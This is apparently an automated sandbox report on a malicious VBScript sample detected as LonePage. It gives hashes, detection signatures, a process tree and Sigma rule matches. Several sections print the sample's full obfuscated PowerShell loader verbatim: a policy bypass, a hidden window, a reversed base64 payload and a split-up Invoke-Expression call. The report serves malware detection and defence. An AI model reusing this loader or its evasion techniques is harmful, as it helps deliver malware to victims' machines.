Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9jJ4aVtoHG.vbs

Overview

General Information

Sample name:9jJ4aVtoHG.vbs
renamed because original name is a hash value
Original sample name:1d291282d7cc027743634f374a5658267a3d1e7c7aa971135c4ec880c1ca7bba.vbs
Analysis ID:1542811
MD5:4d31ff6d1763029cdc976dea87df875f
SHA1:d1c84b2ccbfcaec63a44f618969382eacbbdf158
SHA256:1d291282d7cc027743634f374a5658267a3d1e7c7aa971135c4ec880c1ca7bba
Tags:blogview-shopvbsuser-JAMESWT_MHT
Infos:

Detection

LonePage
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5624 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
    00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
      Process Memory Space: powershell.exe PID: 2220JoeSecurity_LonePageYara detected LonePageJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs", ProcessId: 5624, ProcessName: wscript.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs", ProcessId: 5624, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1
        Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; 